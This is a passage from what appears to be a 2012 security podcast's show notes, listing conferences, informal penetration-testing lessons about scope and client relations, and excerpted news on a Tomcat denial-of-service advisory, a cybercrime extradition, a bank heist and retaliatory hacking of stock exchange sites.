	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<a href="http://shmooconepilogue.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://shmooconepilogue.eventbrite.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t assume that your client has any idea what you do. &nbsp;Don&rsquo;t assume they aren&rsquo;t interested in hearing about it though. &nbsp;Every time you are talking to the customer, you are representing the company. &nbsp;Educating the client is a great way to build business relationships.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Stay within your scope: if you&#39;ve been hired to audit or test &#8211; don&#39;t fix anything.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In my reckless youth I popped a box that had a virus on it. &nbsp;I thought I&#39;d be a superhero and remove the virus so I could laugh about it during my report presentation. &nbsp;Instead the machine locked up, and 300 Kilometres away I could FEEL it&#39;s blue screen. Yeah, it was the company&#39;s payroll server.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Depending on your engagement agreement, if you fuck up something really important (like a payroll system), don&#39;t wait long before reporting it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> If you are doing an audit which consists mostly of interviews, actually perform the interview. Don&rsquo;t go into tangents and stories. It is an interview after all. Ask them to explain their job functions, what they do on a day to day basis, and what types of challenges they run in to. #SoShowMeOrFuckYou</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.demandprogress.org/mission/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.demandprogress.org/mission/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today has been amazing, but there&#39;s one thing that could completely stop SOPA and PIPA in their tracks: </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">President Obama has expressed concerns about the bills, but hasn&#39;t pledged to veto them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please click </span><a href="http://act.demandprogress.org/sign/protectip_docs"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to urge President Obama to promise to veto SOPA and PIPA.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s enough opposition to these bills now that even if they pass, they won&#39;t be able to overcome a veto. &nbsp;&nbsp;A promise to veto the bills will force opponents into a full retreat, and be the perfect way to cap off this week&#39;s protests</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Apache-Tomcat-Users-Advised-to-Update-to-Avoid-Hash-DOS-Attacks-247187.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Apache-Tomcat-Users-Advised-to-Update-to-Avoid-Hash-DOS-Attacks-247187.shtml</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Apache Software developers released an advisory, recommending customers to update their Apache Tomcat software to protect themselves against potential hash denial of service (DOS) attacks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Analysis of the recent hash collision vulnerability identified unrelated inefficiencies with Apache Tomcat&#39;s handling of large numbers of parameters and parameter values,&rdquo; reads the</span><a href="http://mail-archives.apache.org/mod_mbox/tomcat-announce/201201.mbox/4F155CE2.3060301@apache.org"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;These inefficiencies could allow an attacker, via a specially crafted request, to cause large amounts of CPU to be used which in turn could create a denial of service.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the latest releases, the issue was addressed by changing the parameter handling code to process large number of parameters and their values more efficiently.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who rely on Tomcat versions between 7.0.0 and 7.0.22, the ones that utilize Tomcat 6.0.33 and earlier variants, and customers of Tomcat 5.5.34 and prior are advised to immediately update to the latest versions that mitigate the threat.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ll take this opportunity to remind everyone that starting with September 30, 2012, the company will no longer offer support for Apache Tomcat 5.5.x.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This implies that after the aforementioned date, releases from this branch are highly unlikely to be launched and bugs that affect only these variants are no longer addressed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/18/russian_cybercrime_suspect_deported/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/18/russian_cybercrime_suspect_deported/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A suspected Russian cyber-crook has arrived in the US to face charges of security fraud, computer hacking and ID theft following his deportation from Switzerland.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vladimir Zdorovenin, 54, of Moscow, Russia, is alleged to have masterminded a series of credit card theft and stock manipulation scams in conjunction with his son, Kirill Zdorovenin, who has not been apprehended.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both were charged in May 2007, long before Zdorovenin senior was cuffed in Zurich last March. He was deported this week just before a scheduled appearance at a Manhattan federal court on Tuesday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the FBI, the duo&#39;s stock in trade allegedly involved hacking into computers in order to steal credit card details and brokerage account log-ins. The pair would then allegedly run a series of complicated frauds netting hundreds of thousands of dollars. The FBI said that compromised credit account details &ndash; lifted using malware &ndash; were used to make fictitious fraudulent purchases to shell companies allegedly established by the suspects, while compromised brokerage accounts were used to purchase shares held by the pair at ramped-up (artificially inflated) prices.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The father-and-son suspects are accused of frauds which targeted US consumers and ran during 2004 and 2005, according to an FBI</span><a href="http://www.fbi.gov/newyork/press-releases/2012/manhattan-u.s.-attorney-and-fbi-assistant-director-in-charge-announce-extradition-of-russian-citizen-to-face-charges-for-international-cyber-crimes"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on the case.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI assistant director Janice K Fedarcyk explains in the statement: &quot;Zdorovenin&rsquo;s egregious behavior illustrated the true colors of the cyber underground, as he and his son allegedly defrauded consumers of hundreds of thousands of dollars using methods that included compromised credit cards, all fronted through fictitious companies they had created. In addition, Zdorovenin allegedly installed malware to access victims&rsquo; brokerage accounts, trading victims&#39; securities and manipulating the price of stocks Zdorovenin already owned.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3330958/gang-pulls-off-52-million-bank-job-via-remote-access"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3330958/gang-pulls-off-52-million-bank-job-via-remote-access</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals in South Africa have carried off a cunning remote access heist that has left one of the country&#39;s banks nursing a stunning $5.2 million (42 million Rand) loss.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After opening accounts at the South African Postbank months in advance, between 1 and 3 January the gang remotely accessed the computers of two employees using valid logins which were linked to the money transfer system.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Large sums of money were then moved to the mule accounts before being withdrawn from ATMs across the country as cash.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The transfers were apparently not picked up by the internal fraud detection system which might have had something to do with the fact that the period of the theft coincided with a New Year holiday.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Zambian-based</span><a href="http://www.timeslive.co.za/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sunday Times</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> newspaper</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> quoted an unnamed source willing to point the finger at poor IT.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Postbank network and security systems are shocking and in desperate need of an overhaul. This [the bank theft] was always going to be a very real possibility,&quot; the source said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.computerweekly.com/news/2240114040/Israeli-hackers-attack-Arab-stock-exchanges"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240114040/Israeli-hackers-attack-Arab-stock-exchanges</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli hackers claim to have attacked the websites of stock exchanges in Saudi Arabia and Abu Dhabi in retaliation for cyber attacks on the Tel Aviv Stock Exchange website.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Israeli group, calling itself IDF Team, said it was also responding to cyber attacks on the websites of the national airline El Al and several Israeli bank websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group&rsquo;s name is believed to refer to the acronym for the Israel Defence Forces, according to the</span><a href="http://www.ft.com/cms/s/0/7981c42a-4142-11e1-936b-00144feab49a.html?ftcamp=rss#axzz1jmqv9j00"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Financial Times</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
